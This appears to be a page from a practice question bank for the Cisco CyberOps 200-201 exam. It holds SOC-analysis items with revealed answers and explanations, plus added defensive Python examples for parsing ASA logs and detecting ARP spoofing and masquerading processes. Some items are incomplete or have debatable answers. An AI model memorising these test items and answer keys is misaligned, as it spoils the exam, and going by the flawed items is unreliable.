Cisco CyberOps Associate 200-201 (200-201) — Questions 175

507 questions total · 7 pages · All types, answers revealed

Page 1 of 7

1
MCQ (hard)

During a security audit, an analyst finds that a third-party vendor has access to sensitive customer data beyond what is necessary for their services. Which principle of least privilege should the policy enforce?

A. Implement an incident response plan for data leaks
B. Update the end-user license agreement
C. Enforce a data classification and access control policy
D. Invoke a service-level agreement
Answer: C

This policy limits vendor access to only necessary data.

Why this answer

The principle of least privilege means granting only the minimum rights needed. The policy should enforce a data classification and access control policy that restricts vendor access to only required data sets. Option C is correct.

Option A (an incident response plan) is an after-the-fact control for leaks; it does not limit what the vendor can reach. Option B (the end-user license agreement) governs software use between vendor and customer, not data access. Option D (invoking the SLA) enforces service levels, not the scope of data the vendor may see.

2
MCQ (easy)

A small business uses a cloud-based email service. The IT administrator wants to protect against phishing attacks that target employees. Which security control should be implemented first?

A. Conduct weekly security awareness training
B. Install antivirus software on all endpoints
C. Deploy a web application firewall (WAF)
D. Enable multi-factor authentication (MFA) on email accounts
Answer: D

MFA on the email accounts is the most direct control: it defeats the usual goal of phishing, which is a stolen password. A WAF protects web applications the organization hosts and has no view of inbound mail to a cloud service.

Why this answer

Option D is correct because the most common outcome of a phishing campaign against a cloud email tenant is a harvested password, and MFA stops a harvested password from being enough to log in. It is a technical control the administrator can enable centrally in the cloud service, it takes effect immediately for every mailbox, and it does not depend on each employee spotting every lure. Awareness training and mail filtering still belong in the program, but MFA is the control to turn on first.

Exam trap

Cisco often tests the difference between controls that reduce the chance a user is fooled (training) and controls that limit the damage when one inevitably is (MFA). Candidates also reach for the WAF because the service is "cloud-based", but a WAF filters HTTP requests to a web application you operate; it does not sit in front of a SaaS mailbox and never sees the phishing message.

How to eliminate wrong answers

Option A is wrong because training is a preventive human control that lowers click rates but never brings them to zero; it should accompany MFA, not precede it. Option B is wrong because endpoint antivirus acts on malware after delivery and does nothing against a credential-harvesting page that delivers no file. Option C is wrong because a WAF inspects traffic to a web application the organization hosts; it cannot inspect inbound messages in a third-party email service and is not a phishing control at all.

3
MCQ (medium)

A company's security policy requires that all servers have host-based intrusion detection (HIDS) installed and configured to send alerts to the SIEM. During a routine check, you find that a critical database server has HIDS installed but is not sending alerts because the agent service is stopped. The server administrator says he stopped the service because it was using too much CPU. The policy requires that any deviation from baseline must be approved by the security team. What should you do?

A. Restart the service on the server and submit a change request for CPU optimization.
B. Accept the server administrator's justification and document it.
C. Recommend setting the HIDS process priority to low to reduce CPU impact.
D. Report the non-compliance to the security manager and disable the server until compliance is restored.
Answer: A

This restores compliance and initiates the proper process for a permanent fix.

Why this answer

Option A is correct because restarting the agent restores the required monitoring immediately, and the change request routes the CPU problem through the approval process the policy demands. Option B is too lenient: it simply accepts an unapproved deviation from baseline. Option C changes the agent's configuration, which is itself a baseline deviation that needs security-team approval, and a starved low-priority agent may still miss events. Option D is disproportionate: taking a critical database server offline over a stopped agent creates an outage the policy does not call for.

4
Multi-Select (easy)

Which TWO pieces of information are essential for an analyst to correlate when investigating an intrusion alert from a network-based sensor?

Select 2 answers
A. The color of the network cables
B. Source and destination IP addresses
C. The brand of the sensor
D. Timestamp of the alert
E. The name of the security team lead
Answers: B, D

IP addresses identify the communicating hosts.

Why this answer

Source and destination IP addresses are essential because they allow the analyst to identify the communicating endpoints involved in the intrusion attempt. By correlating these addresses with other alert data, the analyst can determine the origin of the attack and the targeted asset, which is critical for scoping the incident and initiating containment actions.

Exam trap

Cisco often tests the distinction between operational data (IP addresses, timestamps) and irrelevant administrative or physical details, trapping candidates who confuse 'essential for correlation' with 'nice to have' or 'commonly known' information.

5
Multi-Select (easy)

Which TWO of the following are best practices for configuring syslog in a secure monitoring environment? (Choose two.)

Select 2 answers
A. Use UDP as the transport protocol to ensure reliable delivery
B. Set log files to overwrite daily
C. Configure a maximum log file size to prevent disk exhaustion
D. Change the default syslog port to avoid detection by attackers
E. Send syslog messages to a centralized log server over a dedicated management network
Answers: C, E

Limiting log size prevents denial of service due to full disk.

Why this answer

Configuring a maximum log file size (with rotation) prevents syslog from filling the disk, which could crash the host or silently stop logging. Forwarding to a centralized log server over a dedicated management network keeps a copy of every event off the originating host, where an intruder could tamper with or delete it, and keeps log traffic away from the user-facing network. For the transport, prefer TCP, ideally with TLS (RFC 5425): UDP syslog is unacknowledged and drops messages under load, the opposite of what option A claims.

Exam trap

Cisco often tests the misconception that changing default ports or using UDP provides security, when in fact these practices do not address real threats like interception or data loss.

6
MCQ (hard)

You are a senior analyst in a SOC that monitors a large financial institution. The SIEM correlates events from firewalls, IDS, endpoints, and database servers. Over the past week, you have noticed multiple low-priority alerts from the IDS indicating 'ET SCAN NMAP -sS' scans from internal IP 10.0.0.50, which is a print server. The alerts occur at random times during business hours. The number of alerts has increased from 5 per day to 20 per day. The print server runs a standard OS and printer management software. No other alerts are triggered from that host. The firewall logs show outbound connections from the print server to IPs on the internet on port 443, which is abnormal for a print server. You check the printer management software and see no recent updates. The user of the print server, the IT administrator, reports no issues. What is your best course of action?

A. Increase the alert threshold to reduce noise and continue monitoring
B. Disable the printer service on the server and monitor for recurrence
C. Dismiss the alerts as false positives because print servers often perform network discovery
D. Isolate the print server from the network and conduct a forensic investigation
Answer: D

Isolation prevents further malicious activity, and forensic analysis can confirm compromise and identify the attack vector.

Why this answer

The print server at 10.0.0.50 is exhibiting multiple indicators of compromise: it is performing NMAP SYN scans (ET SCAN NMAP -sS) from an internal IP, and firewall logs show abnormal outbound HTTPS connections to internet IPs on port 443. These behaviors are inconsistent with a standard print server's role and suggest the host may be compromised, possibly acting as a pivot point for reconnaissance or command-and-control communication. Isolating the host and conducting a forensic investigation is the appropriate incident response step to contain the threat and determine the root cause before it can cause further damage.

Exam trap

Cisco often tests the candidate's ability to recognize that a combination of seemingly low-severity alerts (NMAP scans) and abnormal outbound traffic on a non-web server indicates a compromise, rather than dismissing them as false positives or tuning them out.

How to eliminate wrong answers

Option A is wrong because increasing the alert threshold would ignore potentially malicious activity, allowing a compromised host to continue scanning and exfiltrating data. Option B is wrong because disabling the printer service does not address the underlying compromise; the attacker could still use other services or persistence mechanisms on the server. Option C is wrong because print servers do not normally perform NMAP SYN scans or make outbound HTTPS connections to arbitrary internet IPs; dismissing these as false positives ignores clear signs of anomalous behavior.

7
MCQ (easy)

An analyst is examining a syslog message from a Cisco ASA showing: %ASA-4-106023: Deny udp src outside:192.0.2.1/123 dst inside:10.0.0.5/123. Which type of traffic is being denied?

A. HTTP traffic
B. SNMP traffic
C. NTP traffic
D. DNS traffic
Answer: C

NTP uses UDP port 123.

Why this answer

The syslog message %ASA-4-106023 shows a UDP deny from source 192.0.2.1 port 123 to destination 10.0.0.5 port 123. Port 123 is the well-known port for Network Time Protocol (NTP), which is used for clock synchronization. Therefore, the denied traffic is NTP traffic.

Exam trap

The trap here is that candidates may confuse port 123 with other common UDP services like DNS (port 53) or SNMP (ports 161/162), or assume the '123' is a random number rather than a standard port assignment.

How to eliminate wrong answers

Option A is wrong because HTTP traffic uses TCP port 80 or 8080, not UDP port 123. Option B is wrong because SNMP traffic uses UDP ports 161 (queries) and 162 (traps), not port 123. Option D is wrong because DNS traffic uses UDP port 53 (or TCP for zone transfers), not port 123.
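As an added example that is not part of the original question bank, the following Python parses the %ASA-4-106023 deny message format from this question and labels the denied traffic by its well-known port, which is the lookup the analyst performs by hand above. The sample lines and the abbreviated service table are constructed for illustration; a production parser would cover the other ASA message IDs and carry a full port-to-service map.

```python
import re

# Regex for the ASA 106023 deny message shown in the question: protocol,
# source and destination interface, IP and port. The trailing
# "by access-group ..." text that real messages carry is ignored.
ASA_106023 = re.compile(
    r"%ASA-(?P<sev>\d)-106023: Deny (?P<proto>\S+) "
    r"src (?P<src_if>[^:\s]+):(?P<src_ip>[\d.]+)/(?P<src_port>\d+) "
    r"dst (?P<dst_if>[^:\s]+):(?P<dst_ip>[\d.]+)/(?P<dst_port>\d+)"
)

# Well-known ports the question distinguishes, keyed by (protocol, port).
# Assumed, abbreviated table; extend it from /etc/services for real use.
SERVICES = {
    ("udp", 53): "DNS", ("tcp", 53): "DNS",
    ("udp", 123): "NTP",
    ("udp", 161): "SNMP", ("udp", 162): "SNMP trap",
    ("tcp", 80): "HTTP", ("tcp", 8080): "HTTP", ("tcp", 443): "HTTPS",
    ("tcp", 22): "SSH", ("tcp", 23): "Telnet",
}


def parse_asa_deny(line):
    """Return the fields of a 106023 deny message plus a service label,
    or None if the line is some other message ID."""
    m = ASA_106023.search(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["proto"] = rec["proto"].lower()
    for key in ("sev", "src_port", "dst_port"):
        rec[key] = int(rec[key])
    # Classify by destination port first; fall back to the source port for
    # symmetric protocols such as NTP, where both ends use 123.
    svc = (SERVICES.get((rec["proto"], rec["dst_port"]))
           or SERVICES.get((rec["proto"], rec["src_port"])))
    rec["service"] = svc or f"unknown {rec['proto']}/{rec['dst_port']}"
    return rec


# Constructed sample lines (not from a real device).
SAMPLE = [
    '%ASA-4-106023: Deny udp src outside:192.0.2.1/123 dst inside:10.0.0.5/123 '
    'by access-group "outside_in" [0x0, 0x0]',
    '%ASA-4-106023: Deny udp src outside:192.0.2.7/4098 dst inside:10.0.0.9/161 '
    'by access-group "outside_in" [0x0, 0x0]',
    '%ASA-4-106023: Deny tcp src outside:198.51.100.4/51234 dst dmz:10.0.1.2/22 '
    'by access-group "outside_in" [0x0, 0x0]',
    '%ASA-6-302013: Built outbound TCP connection 12 for outside:198.51.100.4/443 '
    '(198.51.100.4/443) to inside:10.0.0.5/50112 (203.0.113.2/50112)',
]


def classify_all(lines):
    """Parse every 106023 line in `lines`; other message IDs are skipped."""
    return [rec for rec in map(parse_asa_deny, lines) if rec]


if __name__ == "__main__":
    for rec in classify_all(SAMPLE):
        print(f"{rec['service']:10} {rec['proto']} "
              f"{rec['src_if']}:{rec['src_ip']}/{rec['src_port']} -> "
              f"{rec['dst_if']}:{rec['dst_ip']}/{rec['dst_port']}")
```

The source-port fallback matters for exactly the case in the question: NTP clients often use 123 on both ends, so a destination-port-only lookup still works here, but a hardened parser should treat a high ephemeral source port as the normal case and only fall back when the destination port is unknown.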

8
Multi-Select (hard)

Which TWO of the following are valid reasons to use a proxy server for security monitoring? (Choose two.)

Select 2 answers
A. To reduce network latency for monitored traffic
B. To provide a complete log of all network traffic for forensics
C. To inspect encrypted traffic by acting as a man-in-the-middle with SSL decryption
D. To enforce outbound access policies and block connections to known malicious destinations
E. To replace the need for endpoint anti-malware software
Answers: C, D

SSL decryption allows the proxy to see inside HTTPS traffic for malicious content.

Why this answer

Options C and D are correct. A proxy that terminates TLS (with documented consent and its signing certificate deployed to the clients) can inspect the content of HTTPS sessions for malicious payloads, and as the single egress point it can enforce outbound policy and block connections to known malicious destinations such as malware command-and-control servers.

Option A is wrong because a proxy adds a hop and inspection time; it raises latency rather than lowering it. Option B is wrong because a proxy logs only the sessions that traverse it (typically HTTP and HTTPS); it does not capture all network traffic, so it complements flow records and packet capture for forensics rather than replacing them. Option E is wrong because a proxy can block known bad destinations and scan downloads, but it cannot see what already runs on an endpoint or traffic that bypasses it; endpoint anti-malware is still required.

9
MCQ (easy)

Which Windows registry hive contains user-specific configuration settings that can be modified by applications?

A. HKEY_CLASSES_ROOT
B. HKEY_LOCAL_MACHINE
C. HKEY_CURRENT_USER
D. HKEY_USERS
Answer: C

HKCU stores per-user configuration.

Why this answer

HKEY_CURRENT_USER (HKCU) is the correct answer because it stores user-specific configuration settings, such as desktop preferences, environment variables, and application settings, that are loaded from the NTUSER.DAT file when a user logs in. Applications modify this hive to persist per-user customizations, making it the primary location for user-level registry changes.

Exam trap

The trap here is that candidates confuse HKEY_CURRENT_USER with HKEY_LOCAL_MACHINE, assuming all configuration settings are system-wide, but Cisco tests the distinction that per-user application settings are stored in HKCU, not HKLM.

How to eliminate wrong answers

Option A is wrong because HKEY_CLASSES_ROOT (HKCR) stores file association and COM class registration data, not user-specific application settings. Option B is wrong because HKEY_LOCAL_MACHINE (HKLM) contains system-wide configuration settings that apply to all users and require administrative privileges to modify, not per-user settings. Option D is wrong because HKEY_USERS (HKU) contains all loaded user hives on the system, but applications typically write to the current user's hive via HKCU, which is a symbolic link to the specific user's subkey under HKU; direct modification of HKU is uncommon for application settings.

10
MCQ (hard)

A security auditor reviews the SNMP configuration. Which security concern should be reported?

A. The location and contact information is exposed
B. SNMP is disabled on the router
C. The community strings are set to default values
D. The private community string is read-only
Answer: C

Default community strings are easily guessed.

Why this answer

Option C is correct because default SNMP community strings (e.g., 'public' for read-only, 'private' for read-write) are well-known and widely documented. An attacker who discovers these defaults can query or modify the device's MIB, leading to information disclosure or unauthorized configuration changes. This is a critical security concern that must be reported.

Exam trap

Cisco often tests the distinction between the existence of a default community string (a critical vulnerability) versus the access level (read-only vs. read-write) or the exposure of non-sensitive MIB objects like sysLocation.

How to eliminate wrong answers

Option A is wrong because exposing location and contact information is a low-severity information disclosure issue, not the primary security concern when default community strings are in use. Option B is wrong because disabling SNMP is actually a security best practice, not a security concern. Option D is wrong because a read-only private community string is actually more secure than a read-write one; the problem is that the string itself is set to a default value, not its access level.

11
Multi-Select (hard)

Which TWO network behaviors suggest an ARP spoofing attack is occurring? (Choose two.)

Select 2 answers
A. A high number of TCP RST packets
B. A single host sending numerous ARP requests
C. Packets originating from a MAC address that does not match the IP's legitimate MAC
D. An increase in broadcast ARP traffic
E. Multiple IP addresses mapping to the same MAC address
Answers: C, E

Indicates the attacker is sending packets with a spoofed MAC.

Why this answer

Option C is correct because in an ARP spoofing attack, the attacker sends forged ARP replies that associate their own MAC address with the IP address of a legitimate host (e.g., the default gateway). This causes packets destined for that IP to be sent to the attacker's MAC, creating a mismatch between the source MAC in the packet and the legitimate MAC address for that IP. Detecting such mismatches is a key indicator of ARP cache poisoning.

Exam trap

Cisco often tests the distinction between normal ARP traffic (e.g., broadcasts for resolution) and malicious ARP behavior (e.g., multiple IPs on one MAC or MAC-IP mismatches), so candidates mistakenly choose high ARP volume or TCP RSTs as spoofing indicators.
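An added example, not from the original page, that turns the two indicators in this question into detection logic over a constructed stream of ARP replies: a known IP whose MAC changes (option C) and one MAC that claims several IPs (option E). The baseline bindings and the reply records are made up for illustration. The `max_ips_per_mac` parameter is there because a router with secondary addresses or a host with IP aliases can legitimately answer for more than one IP, so the threshold has to be tuned per segment.

```python
from collections import defaultdict

# Constructed ARP replies (timestamp, sender IP, sender MAC) as a sensor or
# a switch's DHCP-snooping table would observe them. Not real captures.
ARP_REPLIES = [
    (1.0, "10.0.0.1",  "00:11:22:aa:bb:01"),  # gateway, legitimate
    (1.2, "10.0.0.20", "00:11:22:aa:bb:20"),  # workstation
    (1.5, "10.0.0.21", "00:11:22:aa:bb:21"),  # workstation
    (5.0, "10.0.0.1",  "00:11:22:aa:bb:99"),  # gateway IP now "is-at" another MAC
    (5.1, "10.0.0.20", "00:11:22:aa:bb:99"),  # same MAC also claims a host IP
    (5.3, "10.0.0.99", "00:11:22:aa:bb:99"),  # the attacker's own address
    (9.0, "10.0.0.1",  "00:11:22:aa:bb:01"),  # real gateway re-announces
]

# Trusted bindings from DHCP leases, a CMDB or static config (assumed).
# Any IP not listed is learned from the first reply seen for it.
BASELINE = {"10.0.0.1": "00:11:22:aa:bb:01"}


def detect_arp_spoofing(replies, baseline, max_ips_per_mac=1):
    """Return alerts for the two indicators from the question:
    'ip-mac-mismatch'      a reply binds a known IP to a different MAC
    'multiple-ips-one-mac' one MAC has claimed more IPs than allowed
    The trusted binding is never overwritten by a conflicting reply, so a
    later re-announcement by the real owner is not reported as an alert."""
    trusted = dict(baseline)        # ip  -> mac we believe is legitimate
    claimed = defaultdict(set)      # mac -> every ip it has answered for
    alerts = []
    for ts, ip, mac in replies:
        claimed[mac].add(ip)
        known = trusted.get(ip)
        if known is None:
            trusted[ip] = mac                # first sighting becomes baseline
        elif known != mac:
            alerts.append((ts, "ip-mac-mismatch", ip, f"{known} -> {mac}"))
        if len(claimed[mac]) > max_ips_per_mac:
            alerts.append((ts, "multiple-ips-one-mac", mac,
                           sorted(claimed[mac])))
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(ARP_REPLIES, BASELINE):
        print(alert)
```

Running it on the constructed stream yields two mismatch alerts (the gateway and a workstation both re-bound to the attacker's MAC) and two multiple-IP alerts for that MAC; the gateway's genuine re-announcement at the end is silent because the trusted binding was never overwritten. On Cisco switches the same check is what Dynamic ARP Inspection performs in hardware against the DHCP snooping binding table.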

12
MCQ (hard)

You are a SOC analyst at a mid-sized company. The company uses a SIEM that ingests logs from firewalls, IDS, and endpoints. Over the past week, you've noticed a gradual increase in outbound traffic from several internal hosts to IP addresses in a foreign country during non-business hours. The traffic is primarily on port 443. The IDS has not generated any alerts. The firewall logs show the connections are established. You check the endpoints and find no unusual processes running. However, the outbound connections persist. What is the most likely explanation and the best next step?

A. Enable SSL decryption on the firewall to inspect the traffic content.
B. Assume the hosts are compromised and reimage them.
C. Ignore the traffic since the IDS and endpoints show no signs of compromise.
D. Immediately isolate all affected hosts from the network.
Answer: A

Provides visibility into encrypted traffic to confirm data exfiltration.

Why this answer

The gradual increase in outbound traffic on port 443 (HTTPS) to foreign IPs during non-business hours, without IDS alerts or suspicious processes, strongly suggests data exfiltration over encrypted channels. Since the traffic is encrypted, the IDS cannot inspect the payload, and endpoint checks may miss stealthy malware that uses legitimate processes (e.g., svchost.exe) for beaconing. Enabling SSL decryption on the firewall allows the SOC to decrypt and inspect the HTTPS traffic, revealing the actual content and confirming or ruling out exfiltration.

Exam trap

Cisco often tests the misconception that a lack of IDS alerts and endpoint anomalies means the network is clean, but the trap here is that encrypted traffic (port 443) can hide malicious activity from signature-based detection, requiring proactive decryption to uncover the threat.

How to eliminate wrong answers

Option B is wrong because reimaging hosts without first confirming compromise is premature and disruptive; the traffic could be legitimate (e.g., cloud backups) and reimaging would destroy forensic evidence. Option C is wrong because ignoring traffic solely because IDS and endpoints show no signs of compromise is a dangerous assumption—encrypted traffic can bypass IDS signatures, and malware can hide from endpoint scans (e.g., fileless or living-off-the-land techniques). Option D is wrong because immediately isolating all affected hosts is an overreaction without evidence of compromise; it would disrupt business operations and may not be necessary if the traffic is benign, and it prevents further investigation.

13
MCQ (easy)

You are a security analyst at a medium-sized company. The company uses a SIEM that collects logs from firewalls, IDS/IPS, and endpoint detection and response (EDR) agents. You receive an alert that a user's workstation (IP 10.0.1.25) has been making outbound connections to an IP address (198.51.100.10) on port 4444 (commonly used by malware). The alert includes a SIEM correlation rule that triggered when three or more connections to that IP occurred within 5 minutes. You check the EDR logs and see that the workstation is running a process named 'svchost.exe' that is connecting to that IP. The process path is C:\Windows\system32\svchost.exe, which is legitimate. However, you notice that the process has a digital signature from 'Microsoft Corporation', but the signature date is from 2021. The workstation's operating system is Windows 10 22H2, fully patched as of last month. The user reports that they have been experiencing slow performance and occasional pop-ups. Which action should you take FIRST to investigate this potential compromise?

A. Perform a full system reimage of the workstation to ensure the malware is removed.
B. Use the EDR to list all DLLs loaded by svchost.exe and look for any suspicious DLLs that are not from Microsoft.
C. Immediately block the outbound connection to 198.51.100.10 at the firewall and isolate the workstation from the network.
D. Verify the digital signature of svchost.exe with Microsoft to ensure it has not been revoked.
Answer: B

This can detect DLL sideloading or injection, which is a common technique.

Why this answer

Option B is correct because the presence of a legitimate svchost.exe with a valid Microsoft signature does not rule out DLL sideloading or injection. By listing all DLLs loaded by the process, you can identify suspicious non-Microsoft DLLs that may be executing malicious code within the trusted svchost.exe context, which is a common technique used by malware to evade detection.

Exam trap

Cisco often tests the misconception that a valid digital signature on a process executable guarantees the process is clean, when in reality attackers frequently use signed Microsoft binaries as hosts for malicious code via injection or sideloading.

How to eliminate wrong answers

Option A is wrong because performing a full system reimage is a drastic, irreversible step that destroys forensic evidence and should only be taken after confirming compromise and preserving data. Option C is wrong because immediately blocking the connection and isolating the workstation may disrupt the investigation and alert the attacker; the first step should be to gather more evidence via EDR before taking containment actions. Option D is wrong because verifying the digital signature of svchost.exe is unnecessary—the signature is already valid and from Microsoft, but malware can still abuse a legitimate signed binary through DLL hijacking or process hollowing.

14
Drag & Drop (medium)

Drag and drop the steps to configure a VLAN on a Cisco switch into the correct order.



Why this order

VLAN creation: enter global configuration mode (configure terminal), create the VLAN (vlan <id>), name it (name <name>), then assign access ports to it from interface configuration (switchport mode access, switchport access vlan <id>). The VLAN must exist before a port can be placed in it, which fixes the order.

15
MCQ (hard)

Based on the exhibit, what does the sequence of events indicate?

A. The wmiprvse.exe process is known to spawn svchost.exe for system health checks.
B. A process masquerading as svchost.exe was spawned by wmiprvse.exe (likely via WMI), and then that malicious process launched calc.exe, a suspicious behavior.
C. The user is executing a macro that opens Calculator.
D. A legitimate system process (wmiprvse.exe) launched a service host, which then launched calc.exe for maintenance.
Answer: B

The path and subsequent execution of calc.exe indicate malicious activity.

Why this answer

The exhibit shows wmiprvse.exe (the WMI Provider Host) spawning a process named svchost.exe, which then launches calc.exe. In normal operation svchost.exe is started by services.exe from C:\Windows\System32 with a -k service-group argument; wmiprvse.exe does not spawn it. The image path in the exhibit is the second indicator: a legitimate svchost.exe lives only in System32, so a copy elsewhere is a masquerade. The chain indicates that an attacker used WMI (for example Win32_Process.Create) to execute a renamed binary, which then launched calc.exe as a test or proof-of-execution payload.

This chain is a classic indicator of remote execution via WMI, a technique commonly used for lateral movement.

Exam trap

Cisco often tests the misconception that svchost.exe is always legitimate and that wmiprvse.exe only spawns itself or system processes, when in fact attackers can use WMI to launch arbitrary executables with a misleading name.

How to eliminate wrong answers

Option A is wrong because wmiprvse.exe does not spawn svchost.exe for system health checks; svchost.exe is started by services.exe, and WMI does not initiate such a process for health monitoring. Option C is wrong because the exhibit shows a process chain (wmiprvse.exe → svchost.exe → calc.exe), not a user directly executing a macro; macros typically run within an Office application, not via WMI and svchost.exe. Option D is wrong because a legitimate system process (wmiprvse.exe) does not launch svchost.exe for maintenance; svchost.exe is a service host, not a maintenance tool, and calc.exe is not a standard maintenance binary.
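Added example, not from the original page: parent-child and image-path checks over constructed process-creation events (the fields Sysmon event ID 1 or an EDR process tree would supply), applying the rule from this question that svchost.exe must be spawned by services.exe from C:\Windows\System32. The event list and the deliberately small expected-parent table are assumptions for illustration; a real baseline covers far more binaries.

```python
import ntpath

# Constructed process-creation events (pid, parent pid, image path), the
# fields Sysmon event ID 1 or an EDR process tree would provide. Not real data.
EVENTS = [
    {"pid": 4,    "ppid": 0,    "image": "System"},
    {"pid": 400,  "ppid": 4,    "image": r"C:\Windows\System32\smss.exe"},
    {"pid": 500,  "ppid": 400,  "image": r"C:\Windows\System32\wininit.exe"},
    {"pid": 600,  "ppid": 500,  "image": r"C:\Windows\System32\services.exe"},
    {"pid": 800,  "ppid": 600,  "image": r"C:\Windows\System32\svchost.exe"},        # legitimate
    {"pid": 2400, "ppid": 800,  "image": r"C:\Windows\System32\wbem\WmiPrvSE.exe"},  # WMI provider host
    {"pid": 3100, "ppid": 2400, "image": r"C:\Users\Public\svchost.exe"},            # masquerade
    {"pid": 3150, "ppid": 3100, "image": r"C:\Windows\System32\calc.exe"},           # payload
]

# Expected parent image and on-disk directory for a few core binaries.
# An assumed, deliberately small allow-list; a real baseline is far larger.
EXPECTED = {
    "svchost.exe":  {"parents": {"services.exe"}, "dir": r"c:\windows\system32"},
    "services.exe": {"parents": {"wininit.exe"},  "dir": r"c:\windows\system32"},
    "lsass.exe":    {"parents": {"wininit.exe"},  "dir": r"c:\windows\system32"},
}


def _name(image):
    """Lower-cased file name of a Windows image path."""
    return ntpath.basename(image).lower()


def find_process_anomalies(events):
    """Flag core binaries whose parent or on-disk location breaks the rule.
    Each finding is (pid, image name, reason)."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        rule = EXPECTED.get(_name(e["image"]))
        if rule is None:
            continue
        parent = by_pid.get(e["ppid"])
        parent_name = _name(parent["image"]) if parent else "<unknown>"
        if parent_name not in rule["parents"]:
            findings.append((e["pid"], _name(e["image"]),
                             f"unexpected parent {parent_name}"))
        if ntpath.dirname(e["image"]).lower() != rule["dir"]:
            findings.append((e["pid"], _name(e["image"]),
                             f"unexpected path {e['image']}"))
    return findings


def ancestry(events, pid):
    """Image names from the root of the tree down to `pid`, so the analyst
    can read the chain behind an alert (e.g. wmiprvse.exe -> svchost.exe -> calc.exe)."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(_name(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain[::-1]


if __name__ == "__main__":
    for pid, name, reason in find_process_anomalies(EVENTS):
        print(f"pid {pid} {name}: {reason}; chain = "
              f"{' -> '.join(ancestry(EVENTS, pid))}")
```

Both findings land on the same pid: the fake svchost.exe fails the parent check (wmiprvse.exe) and the path check (C:\Users\Public). The legitimate svchost.exe under services.exe passes both, and calc.exe is only suspicious by inheritance, which is why the ancestry walk is printed alongside each finding rather than flagging calc.exe on its own.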

16
MCQ (hard)

A Cisco Firepower appliance generates an intrusion specific event with the message 'MALWARE-CNC generic command and control traffic detected'. The analyst needs to determine if the alert is a true positive. Which additional data source would provide the most corroborating evidence?

A. Application control logs
B. URL filtering logs
C. NetFlow records
D. DNS query logs
Answer: D

DNS logs can confirm if the destination is a known CnC domain.

Why this answer

DNS query logs are the most corroborating evidence because malware command-and-control (C2) traffic often relies on DNS to resolve the IP address of the C2 server. A sudden spike in NXDOMAIN responses, queries to algorithmically generated domains (DGA), or requests to known malicious domains in the DNS logs would directly confirm the C2 activity. This aligns with the 'MALWARE-CNC' signature, which specifically targets C2 communication patterns.

Exam trap

Cisco often tests the misconception that NetFlow or URL filtering logs are sufficient for C2 detection, but the key is that DNS logs reveal the domain resolution step that is almost always part of C2 communication, making them the most direct corroborating source.

How to eliminate wrong answers

Option A is wrong because application control logs identify which applications (e.g., HTTP, FTP) are in use but do not reveal the destination domain or IP of C2 traffic, making them insufficient for corroborating C2-specific alerts. Option B is wrong because URL filtering logs show only HTTP/HTTPS requests with full URLs, but C2 traffic often uses non-standard ports or protocols (e.g., DNS tunneling, IRC) that bypass URL filtering entirely. Option C is wrong because NetFlow records provide IP addresses, ports, and byte counts but lack the domain name resolution data needed to confirm C2 domain lookups; they cannot distinguish between a legitimate DNS query and a DGA-based query without additional context.

17
MCQ (medium)

A help desk receives a phone call from someone claiming to be from IT and requesting a password reset. What type of attack is this?

A. Social engineering
B. Phishing
C. Malware
D. Vishing
Answer: D

Vishing is voice phishing conducted over phone calls.

Why this answer

Vishing (voice phishing) is a social engineering attack conducted over voice communication, such as a phone call, where the attacker impersonates a legitimate entity (e.g., IT support) to trick the victim into revealing sensitive information or performing an action like a password reset. This matches the scenario exactly: a phone call from someone claiming to be from IT requesting a password reset.

Exam trap

Cisco often tests the distinction between the general category (social engineering) and the specific attack vector (vishing, phishing, smishing), so the trap here is that candidates see 'social engineering' and select it without recognizing that the question asks for the specific type of attack based on the communication method (phone call).

How to eliminate wrong answers

Option A is wrong because social engineering is the broader category of psychological manipulation, not the specific attack vector (phone call) described; the question asks for the type of attack, not the general technique. Option B is wrong because phishing typically involves electronic communication like email or fraudulent websites, not a direct voice call. Option C is wrong because malware refers to malicious software (e.g., viruses, worms, trojans) and does not involve direct human interaction via a phone call.

18
MCQ (hard)

A SOC analyst is tuning an IPS rule that detects SQL injection attempts. The rule currently generates a high number of alerts, most of which are false positives caused by legitimate web application traffic containing SQL-like keywords. The analyst wants to reduce false positives without missing actual attacks. Which approach is most effective?

A. Implement a whitelist of known good SQL queries from the application.
B. Reduce the rule's sensitivity to only match exact attack patterns.
C. Disable the rule and rely on web application firewall logs.
D. Exclude all HTTP GET requests from inspection.
Answer: A

Whitelisting legitimate queries reduces false positives while keeping detection for other traffic.

Why this answer

Option A is correct because implementing a whitelist of known good SQL queries from the application allows the IPS to ignore benign traffic that matches SQL-like patterns, reducing false positives while still alerting on any SQL injection attempt that deviates from the whitelist. This approach leverages application-specific knowledge to distinguish legitimate queries from malicious ones, maintaining detection coverage for actual attacks.

Exam trap

The trap here is that candidates may think reducing sensitivity (Option B) is the best way to reduce false positives, but Cisco tests the understanding that whitelisting is a more precise method that preserves detection of varied attack patterns while eliminating noise from known benign traffic.

How to eliminate wrong answers

Option B is wrong because reducing the rule's sensitivity to only match exact attack patterns would likely cause the IPS to miss polymorphic or obfuscated SQL injection attempts that do not exactly match the predefined patterns, increasing false negatives. Option C is wrong because disabling the IPS rule and relying solely on web application firewall (WAF) logs removes the network-layer detection capability of the IPS, creating a security gap where SQL injection traffic that bypasses the WAF (e.g., due to misconfiguration or encoding differences) would go undetected. Option D is wrong because excluding all HTTP GET requests from inspection would allow SQL injection attacks delivered via GET parameters (a common vector) to pass through without any alerting, completely undermining the rule's purpose.

19
MCQ (easy)

A security analyst observes a high volume of ICMP echo replies from multiple internal hosts to a single external IP address. Which type of network activity is most likely indicated?

A. Ping sweep
B. ARP spoofing
C. Port scan
D. Smurf attack
Answer: A

Ping sweep sends ICMP echo requests to multiple hosts to discover live hosts.

Why this answer

A ping sweep uses ICMP echo requests to discover live hosts; the observed high volume of ICMP echo replies from multiple internal hosts to a single external IP indicates that the external IP sent a flood of echo requests, and the internal hosts are responding. This is the classic signature of a ping sweep (or ICMP sweep) where an attacker probes a range of internal addresses to map the network.

Exam trap

Cisco often tests the distinction between a ping sweep and a Smurf attack. In a sweep the sender issues individual unicast echo requests to each address in a range and collects the replies itself; in a Smurf attack the attacker sends echo requests to a directed broadcast address with the victim's address forged as the source, so an entire segment answers the victim in a burst. The practical check is the matching request traffic: unicast requests from the external IP to successive internal hosts point to a sweep, while requests arriving at a broadcast address with an external source point to amplification (which is why directed broadcasts are disabled by default on Cisco routers).

How to eliminate wrong answers

